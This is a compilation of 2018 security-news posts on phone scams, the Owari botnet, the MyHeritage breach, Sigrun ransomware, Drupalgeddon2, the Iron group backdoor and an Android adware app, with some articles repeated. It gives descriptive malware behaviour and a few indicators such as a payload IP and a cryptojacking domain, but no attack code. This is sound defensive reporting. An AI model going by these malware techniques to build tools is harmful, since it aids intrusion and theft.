Further details on the Prowli campaign, including IoCs are reported in the analysis published by GuardiCore.

Pierluigi Paganini

(Security Affairs – Prowli, hacking)

The post Prowli Operation – Crooks already compromised over 40,000 servers and IoT Devices appeared first on Security Affairs.



Security Affairs

PSA: Users with landlines are more vulnerable to scams

It’s time to have “the talk” with your parents, relatives, and loved ones. Anyone still using a landline must be warned: having a home phone makes you particularly vulnerable to scams.

We know here at Malwarebytes that our readers are often the unofficial “IT” department for their families, relatives, and friends. While suggesting to your folks that they discontinue having a landline might not go over well, we still need them to at least be wary of that telephone and the types of calls they might receive on it.

What was once an essential communication tool is now a gateway into your home—a scam delivery mechanism.

Looking at all the inbound calls that my relatives with landlines were receiving left me with a sneaky suspicion that they must have landed on a “victim list” of sorts. Types of scam calls included:

  • Tech support scams (as many as several times a day)
  • Robocalls
  • Charity requests (some more dubious than others)
  • Political calls
  • Surveys
  • IRS/Bank/FBI/Police scams (more tax scams during tax season)

While they do not wish to part with their landlines, I have investigated some other possible solutions for my relatives to avoid scams.

I found some call blocker hardware. However, reviews indicated that this wasn’t particularly effective against scammers. For example, this solution wouldn’t stop tech support scammers that spoof residential numbers.

I also found another device that requires a password before allowing the phone to ring from all inbound calls.

Neither of these felt like an acceptable solution.

Ultimately, knowledge is power, so I’m choosing to explain all the scams that they encountered. In addition, I’d like to point out our tech support scam resource page.

Microsoft tech support

The standard, tried and true tech support scam. These are either initiated from a cold call, “Hi, I’m from Microsoft!” or by driving potential victims to make a call to “Microsoft tech support” themselves after being served a malicious pop-up or browser locker with the specific intent of tricking users into thinking their computer is infected. and they need to pay tech support to fix it.

This scam has many variants. The scammers will claim to be the official support for any number of security products. They will try to impersonate Microsoft or other antivirus companies. They have even tried to impersonate Malwarebytes.

There’s a simple fix for this scam. If you get a call from “Microsoft,” hang up immediately. They will never call you. There is no “Internet Tech Support,” and your connection is not monitored for emanating threats.

Note that Microsoft does not send unsolicited email messages or make unsolicited phone calls to request for personal or financial information, or fix your computer.

Unfortunately, most scammers have now switched to pop-ups driving the victims to initiate the call. Even worse, browlocks or browser lockers that effectively prevent further use of the computer is on the rise.

Banks, FBI, police, and the IRS

Scammers will impersonate institutions of authority.

These types of institutions almost never call. If they do, simply ask for their name and their department, and inform them you will call them right back. If they politely say they understand and give you their information, there is a good chance this is a legitimate call. (Keep in mind that it is extraordinarily rare for the FBI, banks, IRS, or police to initiate a call.)

Use the Internet to double-check the number to call back. The scammers may try to be helpful and provide you with theirs, but a quick Google search of their phone number can tell you where they’re calling from (and if that matches with where their company headquarters is located).

If the person on the other end of the line gets angry or starts threatening you, guess what? They’re a scammer. Remember, they’re trying to instill in you a sense of urgency in order to override your common sense.

Stranded grandchildren

An especially heinous scam, this variant targets grandparents using classic psychological manipulation. The scenario is that their grandchild is calling from jail, arrested for disorderly conduct, and this is their one phone call. Sense of urgency? Check. Fear for a loved one? Check. Common sense thrown out the window? Check.

This scam usually tries to get Grandma to send money “for bail” via MoneyGram or Western Union.

So what happens if you get a call from someone claiming to be your grandchild stuck in jail? Well, much of this scam relies on grandparents being less in-the-know about their grandkids. Do they know what her voice sounds like? Her phone number? Would she never be arrested for disorderly conduct?

If you don’t know for sure, verify with other family members. Text the child’s parents while on the landline with her. Confirm that the family member is who she claims to be by asking personal questions only the relative would know. Scammers will try to fudge through details. Some might start crying. Again, the sense of urgency is pivotal in this scam.

Remember this: If your grandchild were truly in trouble and in jail, would you be the one person she would call? If that’s true, then you’d know if it were her on the other end of the line within seconds. If you’re not her go-to person, then it’s fair to ask more questions and to check in with other family members about the legitimacy of the call. You can even hang up and call back your grandchild on her cell. Chances are, she’ll pick up and have no idea who called you just now.

Caller ID is bunk

Nowadays, you can’t just trust that your caller ID will flag suspicious numbers. The responsibility of caller ID lies with the originating call. And if that caller is a scammer, then they know caller ID is trivial to spoof. Scammers have long since figured out how to spoof numbers so that it appears they’re coming from a familiar, local area code, as it greatly increases their chances at a successful scam. Both the Microsoft tech support call and the fake IRS calls use spoofed caller ID.

I demonstrated how easy spoofing was by using an app on my phone and making a call that appeared to originate from somewhere else. For a technical explanation of how caller ID spoofing works, check out this YouTube video.

TLDR

  • Never allow anyone remote access to your computer.
  • Is there a pitch for a product/service/subscription? It’s probably a scam.
  • Is there a sense of urgency? IRS + “you will go to jail!” = scam!
  • Caller ID is bunk. Don’t trust it.
  • No legitimate institutions will want Apple iTunes cards or any other gift card as a payment form.

When it comes to using a land line, I don’t think there’s an ideal solution—one that guarantees 100 percent safety. However, armed with the right amount of knowledge, users can easily fend off scams—and stop being afraid of their phone.

Do you know someone who still has a landline? Have you had to explain scams to your relatives? Ever encounter any different scams than the one mentioned by phone? Please don’t hesitate to share your stories with us in the comments.

The post PSA: Users with landlines are more vulnerable to scams appeared first on Malwarebytes Labs.

Sophisticated keyloggers target the finance industry

Lastline found three separate strains of keylogger malware that are currently targeting finance. Lastline’s analysis of the 100 most recent malware samples found among finance firms uncovered an unusually large number of iSpy keylogger samples, which is a variant of the notorious HawkEye logger, a fully functioning keylogger that sends victim’s credentials to a server under the keylogger operator’s control. By intercepting the communication with the command and control server, Lastline detected the active exfiltration … More

The post Sophisticated keyloggers target the finance industry appeared first on Help Net Security.

It’s not a joke, Owari botnet operators used root as username and password to access a C&C

Security expert Ankit Anubhav discovered a Command and Control server for the Owari botnet protected with weak credentials.

An IoT botnet has been commandeered by white hats after its controllers used a weak username and password combination for its command-and-control server.

Security expert Ankit Anubhav from Newsky Security discovered an IoT botnet that was controlled by an architecture poorly configured, the botmaster used weak credentials for the authentication to the command-and-control server.

The researchers exploited week configuration to take over the MySQL server used to control the Owari botnet, the author left port 3306 open allowing the authentication with “root” as username and password.

“We observed few IPs attacking our honeypots with default credentials, with executing commands like /bin/busybox OWARI post successful login. In one of the cases, a payload hosted on 80(.)211(.)232(.)43 was attempted to be run post download.

When we investigated the IP, we observed that port 3306, the default port for MySQL database, was open.” reads the blog post published by Ankit Anubhav.

“We tried to investigate more into this IP. To our surprise, it is connected to the attacker’s servers using one of the weakest credentials known to mankind.

Username: root
Password: root

The situation is paradoxical considering that Mirai-based botnets, including Owari,  spread through Internet-of-Things devices by brute-force guessing passwords and taking advantage of default credentials.

Database investigation conducted by the experts allowed the expert to discover a User table that contains login credentials for various users who will control the botnet. Some entries could be associated with botmasters or customers of the botnet

“User table contains login credentials for various users who will control the botnet. Some of them can be botnet creators, or some can simply be the customers of the botnet, a.k.a black box users, who pay a sum of money to launch DDoS attacks. Besides credentials, duration limit such as for how much time the user can perform the DDoS, maximum available bots for attack (-1 means the entire botnet army of the bot master is available) and cooldown time (time interval between the two attack commands) can also be observed.” continues the expert.

“In the specific Owari case, we observe one user with duration limit of 3600 seconds with permissible bot usage set as -1(maximum). It is to be noted that the credentials of all these botnet users are also weak.”

Owari botnet

The expert also discovered a history table containing information on the DDoS attacks carried out against various targets. Some of the IP addresses targeted by the botnet were associated with rival IoT botnets.

Anubhav also investigated the revenue model behind the Owari botnet, he was able to reach a known Owari operator that goes online as “Scarface” that provided the following comment:

“For 60$ / month, I usually offer around 600 seconds of boot time, which is low compared to what other people offer. However, it is the only way I can guarantee a stable bot count.” explained Scarface.

“I can’t allow having 10+ people doing concurrent attacks of 1800 seconds each. Usually there is no cooldown on my spots. If I decide to give the cooldown, it’s about 60 seconds or less. 60$/month is not much but when you get 10–15 costumers per month it is enough to cover most of my virtual expenses”

Is this the end for the Owari botnet?

Of course no, even if the expert has taken over the MySQL database, botnet operators continuously change attack IPs to remain under the radar even when the malicious traffic associated to some of their IPs is detected.

The IPs reported in the analysis of the expert are already offline.

Pierluigi Paganini

(Security Affairs – Owari botnet, cybercrime)

The post It’s not a joke, Owari botnet operators used root as username and password to access a C&C appeared first on Security Affairs.

MyHeritage data breach – 92.3 million user credential exposed

A security researcher discovered email addresses and hashed passwords of roughly 92.3 million Myheritage users stored on a private server outside the company.

The huge trove of data was contained in a file named “,” according to the experts the information is authentic and comes from Myheritage.

“Today, June 4, 2018 at approximately 1pm EST, MyHeritage’s Chief Information Security Officer received a message from a security researcher that he had found a file named “myheritage” containing email addresses and hashed passwords, on a private server outside of MyHeritage.” reads the data breach notification published by the company.

“Our Information Security Team received the file from the security researcher, reviewed it, and confirmed that its contents originated from MyHeritage and included all the email addresses of users who signed up to MyHeritage up to October 26, 2017, and their hashed passwords.”

MyHeritage offers a service for the investigation of family history and the reconstruction of the family tree through the DNA analysis.

myHeritage familytree

The expert who made the disconcerting discovery reported it to the company on June 4, 2018, the incident seems to have affected those users who signed up for the service before and including Oct. 26, 2017.

The expert only found usernames and hashed passwords, no other info was discovered on the server hosting the file.

The company pointed out that passwords were not stored in a plain text but did not explain the hashing mechanism used to protect them.

MyHeritage handles billing information through third parties, while DNA data and other sensitive data are stored on segregated systems.

At the time the company hasn’t observed any abuse of compromised data.

“Since Oct 26, 2017 (the date of the breach) and the present we have not seen any activity indicating that any MyHeritage accounts had been compromised.” continues the notification.

“We believe the intrusion is limited to the user email addresses. We have no reason to believe that any other MyHeritage systems were compromised.”

The company set up an Information Security Incident Response Team to investigate the security breach and is going to hire cybersecurity firm to conduct comprehensive forensic investigations.

The company announced it is planning to introduce the two-factor authentication feature to provide a further protection to its users.

“MyHeritage users who have questions or concerns about this incident can contact our security customer support team via email on privacy@myheritage.com or by phone via the toll-free number (USA) +1 888 672 2875, available 24/7.” concluded the company.

“For all registered users of MyHeritage, we recommend that for maximum safety, they change their password on MyHeritage.”

Pierluigi Paganini

(Security Affairs – privacy, data breach)

The post MyHeritage data breach – 92.3 million user credential exposed appeared first on Security Affairs.

The author of the Sigrun Ransomware decrypts Russian victims’ files for free

The author of the Sigrun Ransomware is providing the decryption key to Russian victims for free, others have to pay a ransom of $2,500 worth of Bitcoin or Dash for the victims.

We have reported several cases where Russian malware authors avoid infecting computers in their country, but the case we are going to discuss is interesting too.

The author of the Sigrun Ransomware is providing the decryption key to Russian victims for free, while the malware demands the payment of a ransom of $2,500 worth of Bitcoin or Dash for the victims.

The case was first spotted by the malware researcher Alex Svirid, and other experts confirmed his discovery.

The Sigrun ransomware also avoids infecting Russian victims by detecting the keyboard layout, this behavior allows Russian vxers to avoid the response of local authorities.

When Sigrun ransomware is executed, it will first check “HKEY_CURRENT_USER\Keyboard Layout\Preload” to determine if it is set to the Russian layout. If the machine is using a Russian layout, it will not encrypt its files and delete itself.

Experts pointed out that the ransomware also infects users in the former USSR Republics because many of them don’t use the Russian keyboard layout for political reason. For this reason, the authors of the Sigrun ransomware decided to provide for free the decryption key to Russian victims.

“Ukranian users don’t use russian layout because of political reasons. So we decided to help them if they was infected,” the Sigrun author told BleepingComputer via email. 

“We have already added avoiding Ukrainian layout like was in Sage ransomware before.” They also told us that the email images above are not from Sigrun but another ransomware.

Lawrence Abrams from BleepingComputer has spoken with the author of the malware that told him that he isn’t from former USSR republics.

“Finally, the Sigrun developer told us that they are “not from former USSR republics. I added it because of my Belarus partners.” added Abrams.

When Sigrun ransomware is executed on a computer, it will scan a computer for files to encrypt, when it encrypts a file it will append the .sigrun extension to the encrypted file’s name.  The malware creates two ransom notes named RESTORE-SIGRUN.txt and RESTORE-SIGRUN.html in each folder containing encrypted files.

Experts noticed that it doesn’t encrypt files that match certain extensions, filenames, or that are located in particular folders.

The ransom notes include information on the infection and payment instructions.

“At this time, the Sigrun Ransomware cannot be decrypted for free unless you are a Russian victim and the author helps you,” concluded Lawrence.

Further technical details, including IoCs, are reported in the analysis shared by BleepingComputer.

Pierluigi Paganini

(Security Affairs – cybercrime, Sigrun Ransomware)

The post The author of the Sigrun Ransomware decrypts Russian victims’ files for free appeared first on Security Affairs.

Over 115,000 Drupal Sites still vulnerable to Drupalgeddon2, a gift to crooks

Two months after the release of the security updates for the drupalgeddon2 flaw, experts continue to see vulnerable websites running on flawed versions of Drupal that hasn’t installed security patches.

In March, the Drupal developers Jasper Mattsson discovered a “highly critical” vulnerability, tracked as CVE-2018-7600, aka drupalgeddon2, affecting Drupal 7 and 8 versions.

Both Drupal 8.3.x and 8.4.x are not supported, but due to the severity of the flaw, the Drupal Security Team decided to address it with specific security updates that were issued a few days later.

The vulnerability that could be exploited by an attacker to run arbitrary code on the CMS core component and take over a website just by accessing an URL.

After the publication of a working Proof-Of-Concept for Drupalgeddon2 on GitHub experts started observing attackers using it to deliver backdoors and crypto miners.

Two months after the release of the security updates, experts continue to see vulnerable websites running on flawed versions of Drupal that hasn’t installed security patches.

According to the security researcher Troy Mursch, there are over 115,000 Drupal sites that have installed security patched for drupalgeddon2 vulnerability.

The experts scanning the Internet for websites running Drupal 7.x CMS version found over 500,000 sites, 115,070 of them running outdated versions of the popular CMS that were vulnerable to the Drupalgeddon 2 flaw. The scan didn’t search for 6.x and 8.x sites.

“How many Drupal sites are vulnerable?To find the answer, I began by looking for sites using Drupal 7. This is the most widely used version, per Drupal’s core statistics. Using the source code search engine PublicWWW, I was able to locate nearly 500,000 websites using Drupal 7.” states a report published by Mursch.

“Upon completion of the scan I was able to determine:

  • 115,070 sites were outdated and vulnerable.
  • 134,447 sites were not vulnerable.
  • 225,056 sites I could not ascertain the version used.”

Drupalgeddon2

The researcher found numerous vulnerable sites in the Alexa Top 1 Million, the list includes major US educational institutions, government organizations around the world, a large television network, a multinational mass media and entertainment conglomerate, and two major computer hardware manufacturers.

The expert shared the list of vulnerable websites with US-CERT and other CERT teams worldwide.

Mursch confirmed that cryptojacking campaigns are continuing even after his first report,

“While scanning for vulnerable sites, I discovered a new cryptojacking campaign targeting Drupal sites. One of the affected sites was a police department’s website in Belgium. This campaign uses the domain name upgraderservices[.]cf to inject Coinhive.” added the expert.

The expert published a Google Docs spreadsheet to track the original cryptocurrency mining campaign, the document includes now data on several different campaigns he discovered.

The expert published IoCs for the campaign, the presence online of 115,000 of Drupal 7.x web sites is very danger, a gift for crooks that can abuse them for a broad range of illegal activities.

Pierluigi Paganini

(Security Affairs – Drupal, Drupalgeddon2)

The post Over 115,000 Drupal Sites still vulnerable to Drupalgeddon2, a gift to crooks appeared first on Security Affairs.

Iron cybercrime group uses a new Backdoor based on HackingTeam’s RCS surveillance sw

Security experts at security firm Intezer have recently discovered backdoor, associated with the operation of the Iron cybercrime group, that is based on the leaked source code of Remote Control System (RCS).

The Remote Control System (RCS) is the surveillance software developed by the HackingTeam, it was considered a powerful malware that is able to infect also mobile devices for covert surveillance. RCS is able to intercept encrypted communication, including emails and VOIP voice calls (e.g. Skype), the mobile version, available for all the OSs (AppleAndroid, Symbian, and Blackberry), is also able to completely control the handset and its components, including the camera, the microphone and GPS module.

The Iron cybercrime group has been active since at least 2016, is known for the Iron ransomware but across the years it is built various strain of malware, including backdoors, cryptocurrency miners, and ransomware to target both mobile and desktop systems.

“In April 2018, while monitoring public data feeds, we noticed an interesting and previously unknown backdoor using HackingTeam’s leaked RCS source code.” states the report published by Intezer

“We discovered that this backdoor was developed by the Iron cybercrime group, the same group behind the Iron ransomware (rip-off Maktub ransomware recently discovered by Bart Parys), which we believe has been active for the past 18 months.”

Thousands of victims have been infected by malware used by the crime gang.

The new backdoor analyzed by the experts uses an installer protected with VMProtect and compressed using UPX, the malicious code is able to determine if it is running in a virtual machine.

The malware first drops and installs a malicious Chrome extension, creates a scheduled task, creates a mutex to ensure only one instance of itself is running, drops the backdoor dll to %localappdata%\Temp\\<random>.dat, then checks OS version to determine the backdoor to launch.

The malware halts its execution if detect the presence of Qhioo360 products. It also installs a malicious certificate to sign the backdoor binary as root CA, then creates a service pointing back to the backdoor.

The analysis of the backdoor revealed it uses two main functions in their IronStealer and Iron ransomware families, the VM detection code that was borrowed from the HackingTeam’s “Soldier” implant and the DynamicCall module from HackingTeam’s “core” library.

iron cybercrime group backdoor extension

The malware used a patched version of the popular Adblock Plus chrome extension to inject both the in-browser crypto-mining module (based on CryptoNoter) and the in-browser payment hijacking module.

The extension constantly runs in the background, as a stealth host based crypto-miner. Every minute, the malware checks if Chrome is running, and can silently launch it if it doesn’t.

“The malicious extension is not only loaded once the user opens the browser, but also constantly runs in the background, acting as a stealth host based crypto-miner. The malware sets up a scheduled task that checks if chrome is already running, every minute, if it isn’t, it will “silent-launch” it” continues the analysis.

The backdoor also includes Adblock Plus for IE that is capable of injecting remote JavaScript, a functionality, however, is no longer automatically used.

The malware automatically decrypts a hard coded shellcode that loads Cobalt Strike beacon in-memory, and fetches a payload URL from a hardcoded Pastebin address.

The malicious code is able to drop two malware. a variant of “JbossMiner Mining Worm” tracked as Xagent and the Iron ransomware.

The group used the malware to stealing cryptocurrency from the victim’s workstation, the Iron backdoor drops the latest voidtool Everything search utility and silently installs it to use it for finding files likely containing cryptocurrency wallets.

“IronStealer constantly monitors the user’s clipboard for Bitcoin, Monero & Ethereum wallet address regex patterns. Once matched, it will automatically replace it with the attacker’s wallet address so the victim would unknowingly transfer money to the attacker’s account,” explained the experts.

Further details, including the IoCs are reported in the blog post published by the researchers.

Pierluigi Paganini

(Security Affairs –  Hacking Team, Surveillance)

 

The post Iron cybercrime group uses a new Backdoor based on HackingTeam’s RCS surveillance sw appeared first on Security Affairs.

Mobile Menace Monday: A race to hidden ads

Who doesn’t love a good motorcycle racing game, right? How about one easily available on Google Play, a “safe” place for all your Android app desires? How about a bike racing game that sticks with you so much, you can’t easily uninstall it? And it displays hidden ads?

Wait, what!? That’s right! In the slideshow below, a game titled Motorcycle Race—Bike Race (package name: com.bikeme.racersm) has rave reviews by users who demand to know how to uninstall the game.

Click to view slideshow.

Rev your engines for heightened privileges

So how does one get into such a predicament? That all starts with the install process. Upon installing Motorcycle Race—Bike Race, the first screen asks to Activate device administrator.

Okay, so obviously a bike racing game requesting device administrator rights with permission to Lock the screen is a big red flag. However, if you didn’t catch that, there’s another clue that something is amiss. Look at the app name asking for permission: Media Player. That’s going to make finding the app in the device’s app list rather difficult (hint, hint).

After the initial weirdness of asking for heightened privileges, the app does open and run as advertised.

Click to view slideshow.

Don’t expect the game to perform well, though. It runs so slow and choppy, it makes for an unpleasant experience. This is because it’s doing something much more malicious in the background.

Over the handlebars into full screen ads

After the first time the device’s screen is locked/unlocked, it becomes clear why Lock the screen permission is requested. Behold: annoying lock screen ads that take up the whole screen!

Click to view slideshow.

Time to chuck this bike: how to uninstall

At this point, any user would be ready to ditch this two-wheeled game. However, if the game was given device administrator rights, this isn’t as straightforward as simply dragging the icon to uninstall. The easiest method would be to let Malwarebytes for Android, which detects this as Android/Trojan.HiddenAds.BiRa, remove the app.

However, you can also uninstall the app manually. Let’s start with dragging the icon to uninstall. That’ll bring up this warning pop-up:

Make sure to note the “Bike Racer is part of the following app: Media Player” text, as you’ll need this information later. Click OK to land here.

Next, select Manage device administrators.

Click the check mark to uncheck Media Player (which is the true name of the bike racing app). Depending on the Android OS version, this could also be an on/off toggle switch.

Here’s an extra reminder, as this is the tricky part: Anytime you need to uninstall an app manually, you’re looking for the app name listed after the colon from first warning pop-up: part of the following app:<app name>. It’s easy to assume that it’s listed under the app icon name (in this case Bike Racer). This method is a clever way to obfuscate removal.

Back to uninstalling the app. After you select the check mark, you’ll get to this screen. Click “Deactivate” at the bottom of the screen.

After device administrator rights are revoked, once again drag the icon to uninstall. This time, you’ll be able to successfully remove the app.

You have the right to not give rights

Even when installing apps from reputable sources like Google Play, be careful when you grant device administrator rights. Although there are times when it’s appropriate to grant such rights to an app, make sure the rights line up with the functionality of the app. Giving device administrator rights to a respectable security app in order to remediate ransomware makes sense. A bike racing game needn’t be given the same rights. Why would they need to lock your screen?

With a little scrutiny and a lot of paying attention to the fine print, you can protect yourself from malicious apps that slip by Google Play’s security parameters. Stay safe out there!

The post Mobile Menace Monday: A race to hidden ads appeared first on Malwarebytes Labs.

Security Affairs: Security Affairs newsletter Round 165 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      A bug in T-Mobile site allowed anyone see any customers account details
·      Coca-Cola data breach has affected about 8,000 workers
·      Security Affairs newsletter Round 164 – News of the week
·      BackSwap Trojan implements new techniques to steal funds from your bank account
·      Experts noticed an ongoing activity involving the RIG Exploit Kit to deliver the Grobios Trojan
·      Hackers defaced screens at Mashhad airport in Iran protesting the government
·      MalHide Malware uses the compromised system as an eMail relay
·      Researchers And The FBI Work Together to Take Down the Russian VPNFilter Botnet Targeting Home Routers
·      Abusing Interactive Voice Response systems – Legacy Telecom [CVE-2018-11518]
·      EOS Node Remote Code Execution Vulnerability — EOS WASM Contract Function Table Array Out of Bounds
·      Hacker stole $1.35 million from cryptocurrency startup Taylor
·      The Cobalt Hacking crew is still active even after the arrest of its leader
·      At least 90,000 Canadian bank customers may have been affected by two data breach
·      CVE-2018-11235 flaw in Git can lead to arbitrary code execution
·      New Banking Trojan MnuBot uses SQL Server for Command and Control
·      US-CERT issued an alert on two malware associated with North Korea-linked APT Hidden Cobra
·      Expert found a zero-day RCE in Microsoft Windows JScript component
·      Miscreants hijacked the defunct SpamCannibal blacklist service
·      US Federal court judge rejected a lawsuit by Kaspersky against the ban on its products
·      Crooks expand the original Mirai botnet code base with new capabilities and improvements
·      North Korea-linked Andariel APT Group exploited an ActiveX Zero-Day in recent attacks
·      Ticketfly website was compromised, the hacker also stole customers data
·      Visa payments DOWN: Millions affected by a service disruption
·      Yes, Germany BND foreign intelligence service can spy on the worlds biggest internet exchange
·      Crashing HDDs by launching an attack with sonic and ultrasonic signals
·      Experts believe the botmaster of the VPNFilter is attempting to resume the botnet
·      Flaws in Multidots WordPress Plugins expose e-Commerce websites to a broad range of attacks

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 165 – News of the week appeared first on Security Affairs.



Security Affairs

Security Affairs newsletter Round 165 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      A bug in T-Mobile site allowed anyone see any customers account details
·      Coca-Cola data breach has affected about 8,000 workers
·      Security Affairs newsletter Round 164 – News of the week
·      BackSwap Trojan implements new techniques to steal funds from your bank account
·      Experts noticed an ongoing activity involving the RIG Exploit Kit to deliver the Grobios Trojan
·      Hackers defaced screens at Mashhad airport in Iran protesting the government
·      MalHide Malware uses the compromised system as an eMail relay
·      Researchers And The FBI Work Together to Take Down the Russian VPNFilter Botnet Targeting Home Routers
·      Abusing Interactive Voice Response systems – Legacy Telecom [CVE-2018-11518]
·      EOS Node Remote Code Execution Vulnerability — EOS WASM Contract Function Table Array Out of Bounds
·      Hacker stole $1.35 million from cryptocurrency startup Taylor
·      The Cobalt Hacking crew is still active even after the arrest of its leader
·      At least 90,000 Canadian bank customers may have been affected by two data breach
·      CVE-2018-11235 flaw in Git can lead to arbitrary code execution
·      New Banking Trojan MnuBot uses SQL Server for Command and Control
·      US-CERT issued an alert on two malware associated with North Korea-linked APT Hidden Cobra
·      Expert found a zero-day RCE in Microsoft Windows JScript component
·      Miscreants hijacked the defunct SpamCannibal blacklist service
·      US Federal court judge rejected a lawsuit by Kaspersky against the ban on its products
·      Crooks expand the original Mirai botnet code base with new capabilities and improvements
·      North Korea-linked Andariel APT Group exploited an ActiveX Zero-Day in recent attacks
·      Ticketfly website was compromised, the hacker also stole customers data
·      Visa payments DOWN: Millions affected by a service disruption
·      Yes, Germany BND foreign intelligence service can spy on the worlds biggest internet exchange
·      Crashing HDDs by launching an attack with sonic and ultrasonic signals
·      Experts believe the botmaster of the VPNFilter is attempting to resume the botnet
·      Flaws in Multidots WordPress Plugins expose e-Commerce websites to a broad range of attacks

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 165 – News of the week appeared first on Security Affairs.

McAfee Blogs: High-Tech & Hackable: How to Safeguard Your Smart Baby Devices

It’s just about as creepy as it gets: A hacker breaking into a smart device in your baby’s nursery. The Internet of Things (IoT) has wrapped our homes technology, which means any piece of technology you own — be it a smartphone, a thermostat, or even a baby toy or monitor — is fair game for hackers.

High tech products geared toward parents of newborns and kids are on the rise. Reports show that new parents are fueling this industry and purchasing everything from smart diapers, onesies, baby monitors, digital bassinets, soothers, high-tech swings, breathing monitors, play pads, and a string of smart toys. Parents purchasing baby tech and digital toys are counting on fresh tech ideas and products to increase efficiency and maintain a constant connection to their kids.

But these seemingly efficient products, some argue, could be increasing parent’s stress in some cases. Are these tech products, which are also highly hackable, worth the risk and worry?

The Pros

Peace of mind, safety. Smart baby devices give anxious parents added peace of mind when it comes to worries. Who doesn’t want to see their sweet baby deep in sleep and go to bed without worry? Given a chance, many parents welcome the opportunity to know their baby’s temperature, oxygen levels, heartbeat, and breathing are on track.

Remote monitoring, convenience. When you can be downstairs or working in the yard, or in your home gym, and still check on a sleeping baby, that’s an incredible convenience that many parents welcome as a productivity booster.

Learning and development. Many parents purchase smart devices for kids in an effort to help them stay on track developmentally and ensure they are prepared for the tech-driven world they are heading into.

The Cons

Hackable. Any device that is web-enabled or can connect to the cloud has the potential to be hacked, which can create a whole new set of issues for a family. If you are getting sleeping, breathing, and health data on your child, anyone else could be getting that same information.

False readings. Baby technology, as useful as it appears, can also have glitches that medical professionals argue can be more harmful than helpful. Can you imagine waking up at 2 a.m. to a monitor alarm that falsely says your baby isn’t breathing?

Complex, pricey. Some of the products can be complicated to program and set up and pricey to purchase or replace.

So why would a hacker even want to break into a baby monitor, you may ask? For some hackers, the motive is simply because they can. Being able to intercept data, crash a device, or prove his or her digital know-how is part of a hacker’s reward system. For others, the motives for stalking your family’s activities or talking to kids in the middle of the night can prove to be a far more nefarious activity.

Tips to safeguard baby tech:

Think before you purchase. According to the tech pros, think before buying baby tech and evaluate each item’s usefulness. Ask yourself: Do I need this piece of technology? Will this product potentially decrease or increase my stress? If a product connects to the wi-fi or the cloud, weight its convenience against any risk to your family’s data.

Change default passwords. Many products come with easy-to-guess default passwords that many consumers don’t take the time to change. This habit makes it easy for hackers to break in. Hackers can also gain access to entire wifi networks just by retrieving the password stored on one device. (Sometimes all a hacker does is google a specific brand to find the product’s password — yes, it’s as easy as that!)

Buy from known brands. Buy from reputable manufacturers and vendors. Google to see if that company’s products have ever been digitally compromised. And although it’s tempting to get your device used to save a little money, second-hand technology might have malware installed on it so beware.

Update software, use strong passwords. If there’s a software update alert connected to your baby tech, take the time to update immediately and be sure to choosing a password with a minimum of 16 characters and not using the same password for more than one device.

Turn off. When your devices are not on, there’s no vulnerability so, even with all the safeguards, remember to turn off devices not in use for that last layer of protection.

toni page birdsong

 

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures).

The post High-Tech & Hackable: How to Safeguard Your Smart Baby Devices appeared first on McAfee Blogs.



McAfee Blogs

High-Tech & Hackable: How to Safeguard Your Smart Baby Devices

It’s just about as creepy as it gets: A hacker breaking into a smart device in your baby’s nursery. The Internet of Things (IoT) has wrapped our homes technology, which means any piece of technology you own — be it a smartphone, a thermostat, or even a baby toy or monitor — is fair game for hackers.

High tech products geared toward parents of newborns and kids are on the rise. Reports show that new parents are fueling this industry and purchasing everything from smart diapers, onesies, baby monitors, digital bassinets, soothers, high-tech swings, breathing monitors, play pads, and a string of smart toys. Parents purchasing baby tech and digital toys are counting on fresh tech ideas and products to increase efficiency and maintain a constant connection to their kids.

But these seemingly efficient products, some argue, could be increasing parent’s stress in some cases. Are these tech products, which are also highly hackable, worth the risk and worry?

The Pros

Peace of mind, safety. Smart baby devices give anxious parents added peace of mind when it comes to worries. Who doesn’t want to see their sweet baby deep in sleep and go to bed without worry? Given a chance, many parents welcome the opportunity to know their baby’s temperature, oxygen levels, heartbeat, and breathing are on track.

Remote monitoring, convenience. When you can be downstairs or working in the yard, or in your home gym, and still check on a sleeping baby, that’s an incredible convenience that many parents welcome as a productivity booster.

Learning and development. Many parents purchase smart devices for kids in an effort to help them stay on track developmentally and ensure they are prepared for the tech-driven world they are heading into.

The Cons

Hackable. Any device that is web-enabled or can connect to the cloud has the potential to be hacked, which can create a whole new set of issues for a family. If you are getting sleeping, breathing, and health data on your child, anyone else could be getting that same information.

False readings. Baby technology, as useful as it appears, can also have glitches that medical professionals argue can be more harmful than helpful. Can you imagine waking up at 2 a.m. to a monitor alarm that falsely says your baby isn’t breathing?

Complex, pricey. Some of the products can be complicated to program and set up and pricey to purchase or replace.

So why would a hacker even want to break into a baby monitor, you may ask? For some hackers, the motive is simply because they can. Being able to intercept data, crash a device, or prove his or her digital know-how is part of a hacker’s reward system. For others, the motives for stalking your family’s activities or talking to kids in the middle of the night can prove to be a far more nefarious activity.

Tips to safeguard baby tech:

Think before you purchase. According to the tech pros, think before buying baby tech and evaluate each item’s usefulness. Ask yourself: Do I need this piece of technology? Will this product potentially decrease or increase my stress? If a product connects to the wi-fi or the cloud, weight its convenience against any risk to your family’s data.

Change default passwords. Many products come with easy-to-guess default passwords that many consumers don’t take the time to change. This habit makes it easy for hackers to break in. Hackers can also gain access to entire wifi networks just by retrieving the password stored on one device. (Sometimes all a hacker does is google a specific brand to find the product’s password — yes, it’s as easy as that!)

Buy from known brands. Buy from reputable manufacturers and vendors. Google to see if that company’s products have ever been digitally compromised. And although it’s tempting to get your device used to save a little money, second-hand technology might have malware installed on it so beware.

Update software, use strong passwords. If there’s a software update alert connected to your baby tech, take the time to update immediately and be sure to choosing a password with a minimum of 16 characters and not using the same password for more than one device.

Turn off. When your devices are not on, there’s no vulnerability so, even with all the safeguards, remember to turn off devices not in use for that last layer of protection.

toni page birdsong

 

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures).

The post High-Tech & Hackable: How to Safeguard Your Smart Baby Devices appeared first on McAfee Blogs.

